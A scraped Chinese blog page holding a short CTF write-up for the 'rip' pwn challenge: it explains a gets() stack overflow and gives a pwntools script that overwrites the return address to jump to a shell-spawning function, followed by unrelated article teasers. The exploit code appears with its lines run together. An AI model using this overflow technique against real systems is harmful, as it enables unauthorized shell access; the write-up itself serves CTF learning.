rip-编程知识

rip

news/2024/11/14 14:38:02/文章来源:https://www.cnblogs.com/imtaieee/p/18538802

题目链接：rip。

IDA 打开附件，进入到 main 函数，反编译后如下。

留意到存在 gets 函数，因此存在栈溢出漏洞，经过动态调试，确定在输入 0x17 个字符后，即可覆盖到返回地址。

同时，留意到存在 fun 函数，如下。

因此，直接将程序执行流劫持到 fun 函数，即可 GetShell（此处需要注意堆栈平衡）。

from pwn import *
from pwn import p32, p64, u32, u64
from settings import *
from modules import *def pwn():# 0x0000000000401185 retn;sla("please input\n", 0x17 * b'a' + p64(0x0000000000401185) + p64(0x0000000000401186))irt()pwn()

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/830909.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

test_your_nc

题目链接：test_your_nc。打开附件，进入 main 函数，IDA 反编译如下。因此直接连接即可 GetShell。

【docker应用】从Docker(k8s)镜像或者容器里提取jar包

引言在docker或者k8s上运行了第三方的应用，很多时候我们都想知道运行流程，一般都会docker或者k8s容器中获取jar包。那么该如何把里面的jar包提取出来呢？其实有两种方式，分别为：从镜像信息获取进入容器获取从镜像信息获取首先，查看镜像： docker image ls |grep <…

充电桩普遍选用芯海CSE7761集成3路ADC的免校准单相计量芯片

CSE7761是一款单相多功能电能计量芯片，工作于 3.579MHz 时钟频率，其内部集成了 3 路 sigmadelta ADC、功率计算器、能量-频率转换器、一路 SPI 接口、一路 UART 接口。适用于充电桩、单相多功能电能表、智能插座、智能家电等应用.CSE7761 设计用于精确计算电压有效值、电流有…

喝个水也要整智能家居？

ChatGPT对文章的摘要这篇博客讲述了作者在家庭日常用水管理方面的改进经历。由于家里用水量增多，作者不断优化解决方案，从最初用农夫山泉桶装水，到购买反渗透净水机，再到通过智能化手段简化补水流程。过程中，作者不断提高设备自动化程度，最终实现了全自动化补水，并且详…

基于FPGA的256QAM基带通信系统,包含testbench,高斯信道模块,误码率统计模块,可以设置不同SNR

1.算法仿真效果 vivado2019.2仿真结果如下（完整代码运行后无水印）：设置SNR=40db：将数据导入matlab，显示其星座图：设置SNR=32db：将数据导入matlab，显示其星座图：设置SNR=24db：将数据导入matlab，显示其星座图：系统RTL结构如下：仿真操作步骤可参考程序配套的操作视频…

产业园区，被逼急了

这几年传统的地产开发业务遇到了各种各样的困境，许多房企转而开始积极布局多元化业务，业内的“去地产化”运动也愈演愈烈。在这个时代背景下，产业园开发运营赛道迎来了一波热度爆发，吸引着众多房企和其他多元化主体的参与。那么，在日益升高的关注度与参与度之下，产业地产…

寂寂冬夜

引言没错，本文的标题是嘉然学姐最喜欢的动漫《白色相簿2》中的插曲。今天，chino 的 XCPC 最后一站——杭州站也结束了。(又浪费一年) 于是姑且乱写一番，也算是留下自己虚度光阴的罪证。第一站 CCPC 哈尔滨第一站是 CCPC 哈尔滨站，周六中午和 CD, BE, Sakura, Chen_jr 吃…